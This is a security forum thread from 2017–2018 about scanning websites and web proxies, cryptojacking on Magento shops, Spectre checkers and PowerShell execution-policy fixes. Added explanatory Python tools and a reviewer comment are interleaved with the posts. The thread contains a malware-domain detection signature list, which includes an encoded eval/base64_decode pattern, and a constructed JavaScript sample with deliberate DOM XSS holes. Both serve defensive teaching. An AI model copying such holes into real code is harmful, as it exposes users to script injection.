Are webproxies that privacy friendly? I think not necessarily.

http://toolbar.netcraft.com/site_report?url=https://whoer.net
Comes with the Cloudflare related insecurities...ssl380088.cloudflaressl.com
Cert. installed correctly: Chain installation:
2 certificates found: RSA and ECC.
No HSTS enabled. SSL/TLS compression: Not Enabled
Heartbeat (extension):  Not Enabled

F-grade status and recommendations: https://observatory.mozilla.org/analyze.html?host=whoer.net

3 vulnerable libraries detected: http://retire.insecurity.today/#!/scan/3ccbbb2afaa1871f0fb292e8931723efc456d0f2132388d83efc464a1ff152ef

No third party cookies -  6 third party requests: http://www.cookiechecker.nl/check-cookies.php?url=https://whoer.net/webproxy

Issues with sources and sinks: http://www.domxssscanner.com/scan?url=https%3A%2F%2Fwhoer.net%2Fwebproxy

Tracker tracker and bug issue report: see attached

Finally the beta privacy score: https://privacyscore.org/site/33961/


polonus (volunteer website security analyst and website error-hunter)
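The "sources found / sinks found" counts quoted in the two posts above come from a lexical scan of the page's JavaScript for DOM XSS entry points and dangerous string consumers. As an added example (not the code of domxssscanner.com or of any other tool named in the thread), here is a small scanner of that kind, extended with a first-order taint heuristic: a variable declared straight from a source that later reaches a sink is flagged as well. The JavaScript sample at the bottom is constructed for the demonstration.

```python
import re

# Places attacker-controlled data enters a page (DOM XSS sources).
SOURCES = {
    "location.hash": r"\blocation\.hash\b",
    "location.search": r"\blocation\.search\b",
    "location.href": r"\blocation\.href\b",
    "document.URL": r"\bdocument\.URL\b",
    "document.referrer": r"\bdocument\.referrer\b",
    "window.name": r"\bwindow\.name\b",
    "postMessage data": r"\b(?:event|message|e)\.data\b",
}

# Places where a string is interpreted as HTML or code (DOM XSS sinks).
SINKS = {
    "innerHTML": r"\.innerHTML\s*=[^=]",
    "outerHTML": r"\.outerHTML\s*=[^=]",
    "insertAdjacentHTML": r"\.insertAdjacentHTML\s*\(",
    "document.write": r"\bdocument\.write(?:ln)?\s*\(",
    "eval": r"\beval\s*\(",
    "Function constructor": r"\bnew\s+Function\s*\(",
    "setTimeout/setInterval with string": r"\bset(?:Timeout|Interval)\s*\(\s*[\"'`]",
    "location assignment": r"\blocation(?:\.href)?\s*=[^=]",
}

# 'var x = <expr>' style declarations; used to track variables fed by a source.
DECL_RE = re.compile(r"^\s*(?:var|let|const)\s+([A-Za-z_$][\w$]*)\s*=\s*(.+)$")


def find_matches(js, patterns):
    """Return (pattern name, line number) for every pattern hit, line by line."""
    hits = []
    for lineno, line in enumerate(js.splitlines(), 1):
        for name, pattern in patterns.items():
            if re.search(pattern, line):
                hits.append((name, lineno))
    return hits


def scan(js):
    """Count sources and sinks, then flag sink lines that are fed by a source.

    Two heuristics only: a source and a sink on the same line, or a sink line
    that uses a variable declared directly from a source earlier in the file.
    Real taint tracking through calls and properties is out of scope here.
    """
    sources = find_matches(js, SOURCES)
    sinks = find_matches(js, SINKS)
    source_lines = {ln for _, ln in sources}
    sink_lines = {ln for _, ln in sinks}

    tainted = set()
    suspicious = []
    for lineno, line in enumerate(js.splitlines(), 1):
        decl = DECL_RE.match(line)
        if decl and any(re.search(p, decl.group(2)) for p in SOURCES.values()):
            tainted.add(decl.group(1))
        if lineno in sink_lines:
            same_line = lineno in source_lines
            uses_tainted = any(re.search(r"\b%s\b" % re.escape(v), line) for v in tainted)
            if same_line or uses_tainted:
                suspicious.append(lineno)
    return {"sources": sources, "sinks": sinks, "suspicious_lines": suspicious}


# Constructed sample: a page fragment that mixes safe and unsafe DOM handling.
SAMPLE_JS = """var q = location.hash.substring(1);
document.getElementById('out').innerHTML = q;
document.write('<p>' + document.referrer + '</p>');
var n = window.name;
setTimeout("run(" + n + ")", 10);
console.log(location.href);
el.textContent = location.search;
"""

if __name__ == "__main__":
    result = scan(SAMPLE_JS)
    print("Number of sources found:", len(result["sources"]))
    print("Number of sinks found:", len(result["sinks"]))
    print("Suspicious lines:", result["suspicious_lines"])
```

Line 7 of the sample shows why raw counts overstate the risk: `textContent` is a safe consumer, so a source there is harmless, while lines 2 and 5 show the opposite, a sink that only becomes dangerous because of a source two lines earlier. A real scanner has to follow the data through calls and object properties to tell those cases apart.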
Title: Re: Tests and other Media topics
Post by: polonus on November 07, 2017, 11:52:58 AM
Next to Tor, Tails and Whonix there are different ways to help end-users protect their last little bits of Internet privacy
with a bit of added anonymity.

Also one looks for new ways like the blockchain technology that keeps Bitcoin secure, a decentralised solution against the overpowering intrusion of Big Brother Surveillance State's oversight forces.

A new scheme when the going gets narrow is https://mysterium.network/:

Open Sourced Network allowing anyone to rent their unused Network traffic, while providing a secure connection for those in need.

Hopefully network tld has been properly set to recognize that site's software.
Connection fail here: https://gcm.tlsfun.de/check.php?host=mysterium.network
Connection failed. Host has either no HTTPS or does not support GCM.

See how successful they are: https://privacyscore.org/site/34025/json/
and https://privacyscore.org/site/34025/  PHP/5.5.9-1ubuntu4.21 with twelve vulnerabilities.

Retirable: http://retire.insecurity.today/#!/scan/c989f46450eddf925f09fc10ca4880608fd09dca1b83216db50cbf3b5373b3ac

Externally Linked Host        Hosting Provider              Country
-news.bitcoin.com             CloudFlare                    United States
-bitconnect.co                CloudFlare                    United States
-www.cryptocoinsnews.com      CloudFlare                    United States
-github.com                   GitHub                        United States
-techannouncer.com            GoDaddy.com, LLC              United States
-www.linkedin.com             LinkedIn Corporation          United States
-mvp.mysterium.network        DigitalOcean                  Netherlands
-goo.gl                       Google                        United States
-www.sarunas-savickas.com     OOO NPO Relcom                Lithuania
-www.subscribepage.com        CloudFlare                    United States
-twitter.com                                                United States
-www.the-blockchain.com       CJ2 Hosting&Development       Netherlands
-www.digitaljournal.com       Digital Journal, Inc.         United States
-lt.linkedin.com              LinkedIn Corporation          United States
-medium.com                   CloudFlare                    United States
-cointelegraph.com            CloudFlare                    United States

Please, do not fence us in further!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 10, 2017, 05:49:07 PM
Just stumbled upon this news:
-> https://gwillem.gitlab.io/2017/11/07/cryptojacking-found-on-2496-stores/

Coinhive cryptominer activity going on on over 2500 hacked Magento webshop websites.
Re: https://twitter.com/gwillem/status/928033303466266626

I hope users stop this by using a decent adblocking or scriptblocking extension or a miner blocker extension.

Willem de Groot added this to his software here: https://github.com/gwillem/magento-malware-scanner/pull/157

One could scan a Magento CMS webshop site also here: https://www.magereport.com/

It would be better when browser developers brought a general broader solution to this problem inside the browser,
so users could be alerted to this abuse and eventually block mining through a site they visit.

As long as this has not been realised, we have to fend for ourselves,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 10, 2017, 06:26:57 PM
An attack scenario we could distill from the Coin Hive cryptojacking signatures developed by Willem de Groot comes for Magento webshop sites with amasty.biz vulnerable code. Read: https://support.hypernode.com/knowledgebase/how-to-protect-magento-from-amasty-product-feed-local-file-disclosure/

Rule:
Quote
@@ -648,6 +673,8 @@ ZXZhbChiYXNlNjRfZGVjb2RlK
 aHR0cDovL3Bhc3RlYmluLmNvbS9yYXcv
 account\-mage\.su\/
 air\-frog33\.pw\/
+aleinvest\.xyz\/
+alemoney\.xyz\/
 amasty\.biz\/
 analiticoscdn\.com\/
 animalzz921\.pw\/
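Review bot: the two added patterns `aleinvest\.xyz\/` and `alemoney\.xyz\/` keep the list's escaping and sort order, but like the neighbouring entries they carry no left anchor, so `aleinvest\.xyz\/` also fires on a longer host such as `saleinvest.xyz/` once the lines are joined into one alternation; if false positives on scanned shops matter, a leading `\b` or a separator class in the compiled expression would confine the hit to the listed domain, and a one-line note on where these two hosts were observed (the Coinhive injections this post discusses) would help the next reviewer of the signature file.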

Example https://www.magereport.com/scan/?s=+UNDERARMOUR.COM

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2017, 10:40:49 PM
Working the Cipscis - Fallout - Scriptvalidator for errors that not always come up with other methods:

Example code taken from
Quote
line 39 towards line 45 here: https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=www.paperkrane.com&ref_sel=GSP2&ua_sel=ff&fs=1

Working out this standard with function tooltips
Quote
  < / script >
40:  < !-- /all in one seo pack -->
41:  < link rel='stylesheet' id='contact-form-7-css' href='-http://www.paperkrane.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.0.3' type='text/css' media='all' />
42:  < link rel='stylesheet' id='cpsh-shortcodes-css' href='-http://www.paperkrane.com/wp-content/plugins/column-shortcodes/assets/css/shortcodes.css?ver=0.6.6' type='text/css' media='all' />
43:  < link rel='stylesheet' id='blahlab-theme-grid-css' href='-http://www.paperkrane.com/wp-content/themes/paperkrane/assets/stylesheets/standalone/grid.css?ver=4.1.20' type='text/css' media='all' />
44:  < link rel='stylesheet' id='blahlab-external-googlefonts-css' href='-http://fonts.googleapis.com/css?family=Droid+Serif%3A400%2C400italic%7CDroid+Sans&ver=4.1.20' type='text/css' media='all' />
45:  < link rel='stylesheet' id='blahlab-theme-style-css' href='-http://www.paperkrane.com/wp-content/themes/paperkrane/assets/stylesheets/standalone/style.css?ver=4.1.20' type='text/css' media='all' />
  all links inside the validation broken, because of:
https://urlquery.net/report/6380f772-ee76-42f8-99ff-34728fc03f6f  (suspicious code detected).

Always into this because of (in)security aspects of code, because of polonus's interest in voluntarily website security analysis and website error-hunting, and always looking for new angles to come up with,

Damian

P.S.
Quote
A parser-blocking, cross site (i.e. different eTLD+1) script, htxp://www.google-analytics.com/ga.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://wXw.chromestatus.com/feature/5718547946799104 for more details.
Courtesy Google Chrome's developer console.
on my Greasemonkey json script - reported
Quote
Uncaught SyntaxError: Unexpected end of JSON input
    at JSON.parse (<anonymous>)
    at XMLHttpRequest.xhr.onreadystatechange

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 25, 2017, 01:59:09 PM
You could check here whether your browser is vulnerable:  https://mineblock.org/
I get:
Quote
If the miner doesn't start, your browser is safe!
Can't start miner. Your browser is safe!
The baddies are listed here: http://www.badbitcoin.org/thebadlist/

Bad Bitcoin i.m.o.  is a big ponzi-like blockchain scam scheme, like the Black Tulip hype in the days of our Dutch painter Rembrandt, moreover the bitcoin value now halves every three years and over a few decades all present bitcoins will be mined.

When you wanna block mal-ads, you certainly wanna block bad-bitcoin-mining as well;
a good adblocker and scriptblocker combination will keep you safe from bitcoin mining scripts:
uBlock Origin together with uMatrix.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 25, 2017, 10:59:02 PM
Check how privacy (un)friendly a webproxy is:

Beta-testing: https://privacyscore.org/site/34967/

Here we see issues: https://threatintelligenceplatform.com/report/proxy-de1.toolur.com/sCpTixZZn6

Here we found 3 problems: https://mxtoolbox.com/domain/proxy-de1.toolur.com/

F-grade status and recommendations: https://observatory.mozilla.org/analyze.html?host=proxy-de1.toolur.com

polonus (volunteer website security analyst and website error-hunter)

P.S. What strikes us in the results of this proxy website example as insecure is that the webproxy site does offer https, but does not automatically default to it from http!
Secondly it serves up sub-secure ciphers, and furthermore the server is vulnerable to POODLE, while also the nameserver has version info proliferation: 9.9.4-RedHat-9.9.4-51.el7 (so one could check for vuln. and exploits, which attackers could do).
Also a warning goes for undesired redirects!

Damian
Title: Re: Tests and other Media topics
Post by: polonus on November 30, 2017, 10:52:55 PM
Interesting resources on BGP Security and Routing: http://moo.cmcl.cs.cmu.edu/~dwendlan/routing/

Check site example: https://ip.rst.im/dig/internal.akamaistream.net.

Later we found via another check: as21342/moas
Rate - 4.0 ;  2 Router Leaks ; 54 MOAS ; 532 dDos amplifiers

Now that sitevet dot com also as AS bad history resource has disappeared, we have to look out servers not overreach quotes and sources thus disappear for researchers.  ;)

Linkrot is the worst enemy of a volunteer website security analyst and website error-hunter like little old me,

polonus
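The "54 MOAS" figure in the post above counts prefixes that more than one autonomous system claims to originate, the raw signal behind most hijack and route-leak alerts. As an added example (not the code of any of the services named in the thread), the following script reproduces that count over a set of origin observations and adds the other classic check, a more-specific prefix announced by an origin that does not hold the covering prefix. The route list is constructed from documentation prefixes and private ASNs.

```python
import ipaddress
from collections import defaultdict


def origins_by_prefix(routes):
    """Map each announced prefix to the set of ASNs seen originating it."""
    origins = defaultdict(set)
    for prefix, asn in routes:
        origins[ipaddress.ip_network(prefix, strict=True)].add(asn)
    return origins


def find_moas(routes):
    """Prefixes announced by more than one origin AS (conflict or hijack candidate)."""
    return {str(p): sorted(asns)
            for p, asns in origins_by_prefix(routes).items() if len(asns) > 1}


def find_foreign_more_specifics(routes):
    """More-specific prefixes originated by an AS that does not originate the covering prefix.

    A more-specific from the same AS is ordinary traffic engineering; one from a
    different AS wins the longest-match race and is the classic sub-prefix hijack.
    """
    origins = origins_by_prefix(routes)
    findings = []
    for sub, sub_asns in origins.items():
        for sup, sup_asns in origins.items():
            if sub == sup or sub.version != sup.version or not sub.subnet_of(sup):
                continue
            foreign = sub_asns - sup_asns
            if foreign:
                findings.append((str(sub), sorted(foreign), str(sup), sorted(sup_asns)))
    return sorted(findings)


# Constructed (prefix, origin ASN) observations, as a route collector would list them.
SAMPLE_ROUTES = [
    ("192.0.2.0/24", 64496),
    ("192.0.2.0/24", 64496),        # same origin via another peer: not MOAS
    ("198.51.100.0/24", 64497),
    ("198.51.100.0/24", 64498),     # two origins for one prefix: MOAS
    ("203.0.113.0/24", 64499),
    ("203.0.113.128/25", 64500),    # more-specific from a foreign origin
    ("2001:db8::/32", 64501),
    ("2001:db8:1::/48", 64501),     # more-specific from the same origin: benign
]

if __name__ == "__main__":
    print("MOAS:", find_moas(SAMPLE_ROUTES))
    print("foreign more-specifics:", find_foreign_more_specifics(SAMPLE_ROUTES))
```

A MOAS is not proof of abuse; legitimate multi-homing and anycast produce them too, which is why real monitoring compares the observed origins against RPKI ROAs and IRR route objects before raising an alert.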
Title: Re: Tests and other Media topics
Post by: polonus on December 01, 2017, 11:24:34 PM
Because of recent and present threats to BGP security and the cold cyber-war,
Russia is planning to eventually set up its own Internet only in BRICS countries.


Read here: https://www.theregister.co.uk/2017/12/01/russia_own_internet/

Here a map of the Root Server Technical Operations Assn: http://www.root-servers.org/

Then the root files: https://www.iana.org/domains/root/files

But there are also new innovative solutions like Blockstack coming: https://github.com/blockstack/atlas

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 04, 2017, 12:02:47 AM
New Panopticlick scan launched:

 https://www.eff.org/deeplinks/2017/11/panopticlick-30

See: https://panopticlick.eff.org/

Is your browser blocking tracking ads?   ✓ yes
Is your browser blocking invisible trackers?   ✓ yes
Does your blocker stop trackers that are included in the so-called “acceptable ads” whitelist?   ✓ yes
I just changed my profile using the canvas fingerprint extension.

Current canvas noise hash
#14afxxxxxxxxxxxxxxx3244bxx0271
Last changed: December 4 00:01

polonus
Title: Re: Tests and other Media topics
Post by: REDACTED on December 06, 2017, 12:27:46 AM
Is your browser blocking tracking ads? Partial protection. Considering my ad blocker is Adblock Plus, it might be true.
Is your browser blocking invisible trackers? Partial protection. So Firefox's built-in tracking protection is not enough.
Firefox uses the disconnect.me tracking list, @_@ I really need a plugin/addon for this, huh.
Does your browser stop trackers... acceptable ads? No. Same answer as my previous one.
Does your browser unblock third parties... Do Not Track? No. I set my browser to always block third party trackers.
Does your browser protect you from fingerprinting? Your browser has a unique fingerprint.

Full result of browser fingerprinting:
Screen size is wrong.
No timezone, undefined plugin details.
System fonts are wrong, there are fonts missing from the list.
User agent: Firefox 52, no, I'm using Firefox 57.
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2017, 05:04:26 PM
Nice new scanner outlay for Cymon - Search Threats.

Example of a random IP search result:
https://app.cymon.io/search/ip/209.202.252.95

Enjoy my good friends, enjoy

P.S. Missed completely here: https://www.virustotal.com/#/url/4f5f0accd4fc42fcd4c51851d77c980eaa6f0016aea08de65e3cf3cbb0da9853/detection

Can be combined with these results: https://ransomwaretracker.abuse.ch/ip/209.202.252.95/
and these: https://www.scumware.org/report/209.202.252.95.html

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 11, 2017, 05:18:24 PM
Some signs of computer compromise:

Your AV is disabled and you did not do this yourself.

You get a ransom message and it does not go away after restarting your computer.

You suddenly get frequent pop-ups.

Your online passwords do not work anymore and you did not change them.

Unapproved software suddenly starts to download, and you did not allow it to do so.

Your websearches in your browser are redirected.

Your browser suddenly has a new toolbar added.

You are sending spam to friends on social media for instance , and you did not do that yourself.

Your mouse suddenly starts to move all by itself.

Conclusion: all could be signs of an infected computer or someone hacking into it.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 12, 2017, 10:26:09 PM
Is your server secure against a 19 year old revived crypto attack threat, called by the name of ROBOT?
Background read (facebook has been patched): https://www.theregister.co.uk/2017/12/13/robot_tls_rsa_flaw/

Read: https://robotattack.org/

Check: https://robotattack.org/check/?h=   (for h, give the domain name with and without www).

Test also added here now: https://testssl.sh/

Here: https://github.com/RUB-NDS/TLS-Attacker

Here: https://github.com/tomato42/tlsfuzzer

and here: https://dev.ssllabs.com/

Vulnerable server admins are advised to install available updates or whenever possible disable TLS RSA encryption functionality.

How this could have been kept under the detection radar for that long (19 years) is so far unknown,
but again makes the infrastructure an even more insecure theater.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 18, 2017, 11:12:06 PM
Checked here: https://www.detectadblock.com/

It said that I am allowing ads, good for me.

I have an anti-adblock-solution of sorts running under my Tampermonkey user-script extension,
called Anti-Adblock Killer | Reek and it does a great job for me.

When I meet an adblocker blocker I can choose to block their ads and visit the site via a webproxy anyway.

Otherwise the risk of getting any (3rd party) mal-ad-code is too great in my opinion to even consider lifting my adblocker.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on January 02, 2018, 05:17:48 PM
Test your browser against password manager leak:
https://senglehardt.com/demo/no_boundaries/loginmanager/
this as webtrackers follow internet-users via password managers.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 03, 2018, 12:09:24 AM
Tested IP here: https://www.perfect-privacy.com/check-ip/

Results OK for
Quote
HTTP metadata does not contain any suspicious information
HTTP_VIA   - empty -
HTTP_CLIENT_IP   - empty -
HTTP_CLIENT_IP (DNS)   - empty -
HTTP_FROM   - empty -
HTTP_X_REAL_IP   - empty -
HTTP_X_FORWARDED   - empty -
HTTP_X_FORWARDED_FOR   - empty -
Java disabled
Flash disabled
;)

polonus
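The HTTP_VIA / HTTP_X_FORWARDED_FOR lines in the result above are the CGI names of request headers that an intermediary may add; a proxy check page classifies the proxy by which of them reach the origin. As an added example (not the code of the perfect-privacy.com check page), here is that classification done from the server side, with the header parsing a practitioner actually needs for RFC 7239 `Forwarded`, bracketed IPv6 and trailing ports. The header sets and addresses are constructed from documentation ranges.

```python
import ipaddress

# Headers whose mere presence says "a proxy is in the path".
PROXY_SIGNATURE_HEADERS = ("Via", "Forwarded", "Proxy-Connection", "X-Proxy-ID")
# Headers that commonly carry the real client address (or an e-mail, for From).
CLIENT_IP_HEADERS = ("X-Forwarded-For", "X-Forwarded", "X-Real-IP", "Client-IP",
                     "X-Client-IP", "True-Client-IP", "X-Originating-IP", "From")


def extract_ips(value):
    """Return the IP addresses found in a header value.

    Handles comma/semicolon lists, RFC 7239 'for=' pairs, quoted values,
    bracketed IPv6 and trailing ports; anything that is not an address
    (such as 'unknown' or an e-mail) is skipped.
    """
    found = []
    for token in value.replace(";", ",").split(","):
        token = token.strip()
        if "=" in token:                          # for=203.0.113.7 / proto=https
            token = token.split("=", 1)[1].strip()
        token = token.strip('"')
        if token.startswith("["):                 # "[2001:db8::1]:4711"
            token = token[1:token.find("]")] if "]" in token else token[1:]
        elif token.count(":") == 1:               # "203.0.113.7:4711"
            token = token.rsplit(":", 1)[0]
        try:
            found.append(str(ipaddress.ip_address(token)))
        except ValueError:
            continue
    return found


def classify_proxy(headers):
    """Return the anonymity level a proxy-check page would print.

    elite:       nothing in the headers reveals a proxy or the client address
    anonymous:   a proxy is visible (Via/Forwarded) but the client address is not
    transparent: the client address is forwarded to the server
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    present = [h for h in PROXY_SIGNATURE_HEADERS + CLIENT_IP_HEADERS if h.lower() in lowered]
    leaked = []
    for h in CLIENT_IP_HEADERS + ("Forwarded",):
        if h.lower() in lowered:
            leaked.extend(extract_ips(lowered[h.lower()]))
    leaked = list(dict.fromkeys(leaked))          # de-duplicate, keep order
    if leaked:
        level = "transparent"
    elif present:
        level = "anonymous"
    else:
        level = "elite"
    return {"level": level, "proxy_headers": present, "leaked_client_ips": leaked}


# Constructed requests as three kinds of path would deliver them to the origin.
DIRECT = {"Host": "example.test", "User-Agent": "Mozilla/5.0"}
ANONYMOUS_PROXY = {"Host": "example.test", "Via": "1.1 proxy.example.test"}
TRANSPARENT_PROXY = {"Host": "example.test", "Via": "1.1 proxy.example.test",
                     "X-Forwarded-For": "203.0.113.7, unknown, 10.0.0.1"}

if __name__ == "__main__":
    for name, hdrs in [("direct", DIRECT), ("anonymous", ANONYMOUS_PROXY),
                       ("transparent", TRANSPARENT_PROXY)]:
        print(name, classify_proxy(hdrs))
```

Two caveats belong with such a check. A clean "elite" result only shows what the proxy adds to the request, not what it logs, and every one of these headers is whatever the last hop chose to send: a client can forge `X-Forwarded-For` itself, so an origin must never use these values for access control or rate limiting unless a trusted front-end overwrites them.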
Title: Re: Tests and other Media topics
Post by: polonus on January 08, 2018, 09:59:21 PM
Check here your Spectre CPU vulnerability

http://xlab.tencent.com/special/spectre/spectre_check.html

Enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on January 08, 2018, 10:20:04 PM
Check here your Spectre CPU vulnerability

http://xlab.tencent.com/special/spectre/spectre_check.html

Enjoy, my friends, enjoy,

polonus

I had thought this would actually be a CPU check for vulnerability, as per the 'bold text.'

However, this would be browser check and not a CPU check.
Title: Re: Tests and other Media topics
Post by: polonus on January 08, 2018, 11:04:25 PM
Hi DavidR,

Probably you did not grasp the workings of the Spectre bug.
Explained in layman's terms, it goes sort of like this: to get info out of a box (browser cache in this case), where it should not leave your system, they question the CPU cache and this could cheat on confidential info you don't wanna share, but your chip will anyway.

Above is a check of how your browser is vulnerable to this pre-cache CPU info cheating bug thingie, without overhyping it.
So we have to see that connections are now being made more secure, encryption more solid etc. until a new range of non-vulnerable chips comes into production.

Your chip is cheating inside the browser, wherever it should, because it was a stupid way of enhancing the speed with pre-guessing to make it faster. If they check, say, for G and get a fractional glimpse of G and then later the cache protection says Y, they still could have a good guess inside the CPU a fraction earlier that it was indeed G they were after. Capito?

So it is definitely Spectre CPU related.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on January 08, 2018, 11:17:55 PM
Maybe browsers should come up with a cache flush button.

What your browser does not (re)collect, it cannot spread.

So guys and gals flush that browser cache.

Two more spectre tests: https://github.com/wearefriday/spectre tool
Info credits go to vgrigorik & nickdunn

Testing on Windows via a Powershell command, read:
https://www.bleepingcomputer.com/news/microsoft/how-to-check-and-update-windows-systems-for-the-meltdown-and-spectre-cpu-flaws/ info credits go out to Catalin Cimpanu

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on January 09, 2018, 12:12:02 AM
Hi DavidR,

Probably you did not grasp the workings of the Spectre bug.
Explained in layman's terms, sort of going like this to get info out of a box (browser cache in this case, where it should not leave your system, they question the CPU cache and this could cheat on confidential info you don't wanna share, but your chip will anyways.
<snip>
So it is definitely Spectre CPU related.

Damian

It is just that the bold headline is somewhat misleading when it only talks of CPU vulnerability but the test is only browser related.

So it was surprising when it is only checking your browser in isolation.  For instance if your CPU isn't vulnerable why check the browser.  On this win10 system with the latest firefox version 57.0.4 (64-bit), it reports the browser isn't vulnerable.

Though if I ran this test on my XP system with the ESR version of Firefox it may be different, but the major thing on my XP system is by all accounts my 'old not modern' CPU isn't vulnerable.
Title: Re: Tests and other Media topics
Post by: polonus on January 09, 2018, 12:54:11 AM
Firefox and Google's browser are already patched for this; as with most patching this will be only in a software manner,
as the Intel hardware design flaw/hole can only be patched with a new secure upcoming production line,
and this will not be with us until 2020.

As we know the flaw can again be abused through JavaScript played out within very tiny time frames.

As we both have known now for a long time, blocking JavaScript from running inside a browser
is the best security measure one could take under all circumstances and for all kinds of threats.

Over to a completely other subject:

I am always on the look-out to combine non-likely related results to get at a better overall verdict, like
the malware presented from here: http://urlquery.net/report/0e68bab7-835a-4ca5-b9bb-2f075f1a6188
combined with results like here: http://sun-adv.com.dnstree.com/

Damian
Title: Re: Tests and other Media topics
Post by: polonus on January 10, 2018, 12:10:17 AM
Just like the new service from VT for registered users, this is also new:
https://urlscan.io/result/9b5e14d3-7ce4-49b0-a26f-b8adccb8046d/related/

Related from: https://urlscan.io/result/9b5e14d3-7ce4-49b0-a26f-b8adccb8046d/#summary

As it was discussed in the viruses and worms section, this makes it all the more relevant to Webzilla abuse,
a Dutch hosting AS. Spamhaus just asked cloud providers to make a bigger effort to fight off spam botnets.

Reported: https://www.spamhaus.org/news/article/772/spamhaus-botnet-threat-report-2017

We also have to do our bit as end users report botnet abuse on the Interwebs here and else-where.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on January 10, 2018, 04:57:30 PM
Check whether your Windows cpu is vulnerable to Meltdown and Spectre:

https://www.ashampoo.com/en/usd/pin/1304/security-software/spectre-meltdown-cpu-checker

polonus

Anyone found results for AMD E1 chips? Scan results may not materialize...

D
Title: Re: Tests and other Media topics
Post by: bob3160 on January 10, 2018, 06:15:43 PM
Check whether your Windows cpu is vulnerable to Meltdown and Spectre:

https://www.ashampoo.com/en/usd/pin/1304/security-software/spectre-meltdown-cpu-checker

polonus
(https://screencast-o-matic.com/screenshots/u/Lh/1515604484704-22878.png)
A bit strange since this system is totally updated ???
Title: Re: Tests and other Media topics
Post by: polonus on January 10, 2018, 09:23:34 PM
Hi bob3160,

Probably it has to do with not all vendors having given you the necessary firmware updates.
The reason is probably your video card, which is still vulnerable to Spectre.

Spectre should be mitigated only via a firmware hardware update,
and these will finally be due at the end of this month.

The real definite mitigation of the Intel debacle needs a new hardware chip and that may,
taking a bit of debugging and the necessary testing, be scheduled for another two years  ::)

So this means a lot of new laptops, computers, smartphones and all sorts of IoT devices to buy,
or in need of maintenance, and a new "total recall", to speak with Schwarzenegger.

This Spectre/Meltdown debacle is gonna cost us all.
The only laughing third party is commerce, they are gonna get extra revenue big time.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 11, 2018, 01:30:26 PM
Those that tested with this tool be extra careful,
your settings may have been changed by the test tool.
  :o

Nota Bene!
The use of the Ashampoo Spectre Meltdown CPU Checker will result in the Windows PowerShell ExecutionPolicy for CurrentUser being set, and remaining set, as "Bypass".
This while the standard setting should be "Undefined" or "Restricted" and not "Bypass".

To check your PowerShell ExecutionPolicies and correct the settings,
open Windows PowerShell by right-clicking and choosing "Execute as Administrator".

Inside Windows PowerShell, give the following command:
Get-ExecutionPolicy -list

When for CurrentUser it is listed that the ExecutionPolicy has been set as "Bypass",
restore the default settings by giving the following command:
Set-ExecutionPolicy -ExecutionPolicy Default -Scope CurrentUser

Or just set this not for CurrentUser but for all scopes at a time:
Set-ExecutionPolicy -ExecutionPolicy Default

Documented here:
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-5.1

Info credits go to itman, re:
https://www.wilderssecurity.com/threads/kernel-memory-leaking-intel-processor-design-flaw-forces-linux-windows-redesign.399338/page-16#post-2730623
https://www.wilderssecurity.com/threads/kernel-memory-leaking-intel-processor-design-flaw-forces-linux-windows-redesign.399338/page-16#post-2730646

Info credits for the above message go to Spiff (security dot nl).

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on January 11, 2018, 02:20:27 PM
(https://screencast-o-matic.com/screenshots/u/Lh/1515676586563-50493.png)

(https://screencast-o-matic.com/screenshots/u/Lh/1515676718361-73246.png)
After a reboot, I'll check to see if I have updates waiting for me.
Title: Re: Tests and other Media topics
Post by: polonus on January 11, 2018, 02:48:45 PM
Another way could be to set it to

Quote
MachinePolicy        Undefined
UserPolicy             Undefined
Process                 Undefined
CurrentUser          Undefined
LocalMachine        Undefined

pol
Title: Re: Tests and other Media topics
Post by: polonus on January 11, 2018, 02:56:54 PM
Adopt Chromium OS settings:

Quote
Chrome Site Isolation -> https://support.google.com/chrome/answer/7623121

If you are using Google Chrome or Chromium, please follow the steps below:

Type chrome://flags in the address bar and press Enter.
Scroll down the page and find “Strict site isolation” and press the Enable button.
Restart the Chrome browser.
https://www.chromium.org/Home/chromium-security/ssca

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 11, 2018, 03:10:37 PM
Checking on domain configuration and certificate installed...

For this PHISHING domain: -guru.cr

Re: https://toolbar.netcraft.com/site_report?url=guru.cr
Re: https://cryptoreport.websecurity.symantec.com/checker/
Results:
Quote
Certificate is installed correctly
Common name:
 guru.cr
SAN:
 guru.cr, cpanel.guru.cr, gurucr.com, mail.guru.cr, mail.gurucr.com, webdisk.guru.cr, webmail.guru.cr, whm.guru.cr, www.guru.cr, www.gurucr.com
Valid from:
 2017-Dec-29 00:00:00 GMT
Valid to:
 2018-Mar-29 23:59:59 GMT
Certificate status:
 Valid
Revocation check method:
 OCSP
Organization:
 
Organizational unit:
 
City/locality:
 
State/province:
 
Country:
 
Certificate Transparency:
 Not embedded in certificate
Serial number:
 f549d40077ef9ca14b21b7a669b991f1
Algorithm type:
 SHA256withRSA
Key size:
 2048
Certificate chain:
COMODO RSA Certification Authority (intermediate certificate)
cPanel, Inc. Certification Authority (intermediate certificate)
guru.cr (tested certificate)
Server configuration
Host name:
 198.23.60.248
Server type:
 Apache
IP address:
 198.23.60.248
Port number:
 443
Protocols enabled:
TLS1.2
TLS1.1
